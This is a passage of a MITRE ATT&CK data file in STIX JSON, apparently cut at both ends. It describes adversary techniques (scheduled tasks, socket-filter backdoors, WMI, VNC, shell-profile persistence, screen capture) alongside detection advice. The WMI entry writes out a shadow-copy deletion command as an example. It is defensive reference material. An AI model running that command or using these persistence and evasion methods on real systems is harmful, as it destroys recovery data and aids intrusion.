@ZackDoesML", "Selena Larson, @selenalarson", "Sittikorn Sangrattanapitak"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "created": "2019-11-27T14:58:00.429Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/005", "external_id": "T1053.005"}, {"source_name": "ProofPoint Serpent", "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.", "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"}, {"source_name": "Defending Against Scheduled Task Attacks in Windows Environments", "description": "Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.", "url": "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments"}, {"source_name": "Twitter Leoloobeek Scheduled Task", "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.", "url": "https://twitter.com/leoloobeek/status/939248813465853953"}, {"source_name": "Tarrask scheduled task", "description": "Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.", "url": "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/"}, {"source_name": "Microsoft Scheduled Task Events Win10", "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events"}, {"source_name": "TechNet Scheduled Task Events", "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.", "url": "https://technet.microsoft.com/library/dd315590.aspx"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "TechNet Forum Scheduled Task Operational Setting", "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.", "url": "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen"}, {"source_name": "SigmaHQ", "description": "Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule Task - Registry. Retrieved June 1, 2022.", "url": "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-05-21T16:22:21.025Z", "name": "Socket Filters", "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tim (Wadhwa-)Brown", "CrowdStrike"], "x_mitre_deprecated": false, "x_mitre_detection": "Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": [], "x_mitre_system_requirements": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "created": "2022-09-30T21:18:41.930Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1205/002", "external_id": "T1205.002"}, {"source_name": "exatrack bpf filters passive backdoors", "description": "ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.", "url": "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf"}, {"source_name": "crowdstrike bpf socket filters", "description": "Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.", "url": "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/"}, {"source_name": "Leonardo Turla Penquin May 2020", "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u00e2\u0080\u009cPenquin_x64\u00e2\u0080\u009d. Retrieved March 11, 2021.", "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf"}, {"source_name": "haking9 libpcap network sniffing", "description": "Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.", "url": "http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:56:58.380Z", "name": "Block Command Message", "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Process: Process Termination", "Operational Databases: Process History/Live Data", "Application Log: Application Log Content", "Network Traffic: Network Traffic Flow", "Operational Databases: Process/Event Alarm"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0803", "external_id": "T0803"}, {"source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"}, {"source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Indicator Removal from Tools", "description": "If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Log analysis", "Host intrusion prevention systems", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", "created": "2017-05-31T21:30:54.176Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1066", "external_id": "T1066"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-09-15T19:02:53.995Z", "name": "Archive via Utility", "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. \n\nOn Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Mayan Arora aka Mayan Mohan", "Mark Wee"], "x_mitre_deprecated": false, "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "created": "2020-02-20T21:01:25.428Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1560/001", "external_id": "T1560.001"}, {"source_name": "WinRAR Homepage", "description": "A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.", "url": "https://www.rarlab.com/"}, {"source_name": "WinZip Homepage", "description": "Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.", "url": "https://www.winzip.com/win/en/"}, {"source_name": "7zip Homepage", "description": "I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.", "url": "https://www.7-zip.org/"}, {"source_name": "diantz.exe_lolbas", "description": "Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Diantz/"}, {"source_name": "Wikipedia File Header Signatures", "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", "url": "https://en.wikipedia.org/wiki/List_of_file_signatures"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "VNC", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (\u201cremote framebuffer\u201d) protocol to enable users to remotely control another computer\u2019s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["VNC server installed and listening for connections."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "created": "2020-02-11T18:28:44.950Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/005", "external_id": "T1021.005"}, {"source_name": "The Remote Framebuffer Protocol", "description": "T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.", "url": "https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2"}, {"source_name": "MacOS VNC software for Remote Desktop", "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac"}, {"source_name": "VNC Authentication", "description": "Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.", "url": "https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication"}, {"source_name": "Hijacking VNC", "description": "Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.", "url": "https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc"}, {"source_name": "macOS root VNC login without authentication", "description": "Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.", "url": "https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication"}, {"source_name": "VNC Vulnerabilities", "description": "Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.", "url": "https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/"}, {"source_name": "Offensive Security VNC Authentication Check", "description": "Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.", "url": "https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/"}, {"source_name": "Attacking VNC Servers PentestLab", "description": "Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.", "url": "https://pentestlab.blog/2012/10/30/attacking-vnc-servers/"}, {"source_name": "Havana authentication bug", "description": "Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.", "url": "http://lists.openstack.org/pipermail/openstack/2013-December/004138.html"}, {"source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.", "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"}, {"source_name": "Gnome Remote Desktop grd-settings", "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207"}, {"source_name": "Gnome Remote Desktop gschema", "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-11T18:13:25.130Z", "name": "Windows Management Instrumentation", "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being \u201cdisabled by default\u201d on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["@ionstorm", "Olaf Hartong, Falcon Force", "Tristan Madani"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "created": "2017-05-31T21:30:44.329Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1047", "external_id": "T1047"}, {"source_name": "FireEye WMI 2015", "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"}, {"source_name": "Mandiant WMI", "description": "Mandiant. (n.d.). Retrieved February 13, 2024.", "url": "https://www.mandiant.com/resources/reports"}, {"source_name": "WMI 6", "description": "Microsoft. (2022, June 13). BlackCat. Retrieved February 13, 2024.", "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/"}, {"source_name": "WMI 1-3", "description": "Microsoft. (2023, March 7). Retrieved February 13, 2024.", "url": "https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page?redirectedfrom=MSDN"}, {"source_name": "WMI 7,8", "description": "Microsoft. (2024, January 26). WMIC Deprecation. Retrieved February 13, 2024.", "url": "https://techcommunity.microsoft.com/t5/windows-it-pro-blog/wmi-command-line-wmic-utility-deprecation-next-steps/ba-p/4039242"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-15T20:24:13.473Z", "name": "Malicious Shell Modification", "description": "Adversaries may establish persistence through executing malicious commands triggered by a user\u2019s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files (Citation: intezer-kaiji-malware). These files require root permissions and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile (Rocke) which are sourced when a user opens a command line interface or connects remotely. Adversaries often use ~/.bash_profile since the system only executes the first file that exists in the listed order. Adversaries have also leveraged the ~/.bashrc file (Tsunami, Rocke, Linux Rabbit, Magento) which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command line interface. Some malware targets the termination of a program to trigger execution (Cannon), adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session(Pearl_shellbot). \n\nFor macOS, the functionality of this technique is similar but leverages zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin. The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Robert Wilson", "Joe Gervais", "Tony Lambert, Red Canary"], "x_mitre_deprecated": false, "x_mitre_detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /ect/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Apple\u2019s Security Endpoint Framework using the ES_EVENT_TYPE_NOTIFY_WRITE function for monitoring these specific files. \n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1156", "external_id": "T1156"}, {"source_name": "intezer-kaiji-malware", "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.", "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-03-30T21:01:39.967Z", "name": "Screen Capture", "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "created": "2017-05-31T21:31:25.060Z", "created_by_ref": 